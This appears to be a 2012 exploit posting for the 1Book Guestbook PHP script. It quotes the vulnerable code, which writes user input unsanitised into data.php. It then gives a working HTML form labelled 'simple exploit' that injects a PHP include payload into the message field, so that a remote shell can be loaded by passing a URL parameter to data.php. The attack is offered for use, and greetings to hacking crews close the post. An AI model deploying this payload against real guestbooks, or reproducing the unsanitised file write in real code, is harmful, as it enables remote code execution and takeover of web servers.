1Book Guestbook suffers from a remote code execution vulnerability.
3675ff190b99fcfa37458cc6427c5bb0=========================================================
=============== JIKI TEAM [ Maroc And YameN ]===============
=========================================================
# Author : jiko
# email : jalikom@hotmail.fr
# Home : www.no-back.org & no-exploit.com
# Script : 1Book Guestbook Script
# Bug : remote code execution
# Download : http://1scripts.net/scripts/1book.zip
=========================JIkI Team===================
# if(in_array($_POST['username'], $bannedusers))
# echo 'Your username has been banned by the administrator.<br/><br/>';
# if(in_array($_SERVER['REMOTE_ADDR'], $bannedips))
# echo 'Your IP has been banned by the administrator.<br/><br/>';
# elseif($_POST['1'] + $_POST['2'] != $_POST['check'])
# echo('You answered the security question incorrectly.');
# else
# {
# $data = unserialize(file_get_contents('data.php'));
# array_push($data, array('user' => $_POST['username'], 'date' =>
mktime(), 'message' => $_POST['message'], 'website' =>
$_POST['website'], 'ip' => $_SERVER['REMOTE_ADDR']));
# file_put_contents('data.php', serialize($data));
# }
#
#}
#===========================================================================================================================#
# So, we can write a malicious code like <?php include($jiko); ?> in
the variable $message, and $username #
# and then we go in
http://Site/script/data/data.php?jiko=[shell]
#
#===========================================================================================================================#
simple exploit whith HTML:
-------------------------
change site by your site
+++++++++++++++++++++++++
<title> EXploit BY JIKO</title>
<center>
<form method="post" action="site/guestbook.php">
<input type=hidden name=username value="jiko was here" >
<input type=hidden name=message value="<? include($jiko) ?>" >
<input type=submit value="send">
</form>
<h5>a fter send your usage:
<br>http://site/scripts/data.php?jiko=[shell]</h5>
=========================================================
greetz:
all my friend [kil1er & GhosT HaCkEr & stack ] and H-T Team and all No-back members and tryag.Com
visit: www.no-back.org & www.tryag.com & no-exploit.com
=========================================================
**************************
hello brother i want chnage my name Jiki Team to JiKo and my email to
jalikom@hotmail.fr and this a news bug
remote code execution
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!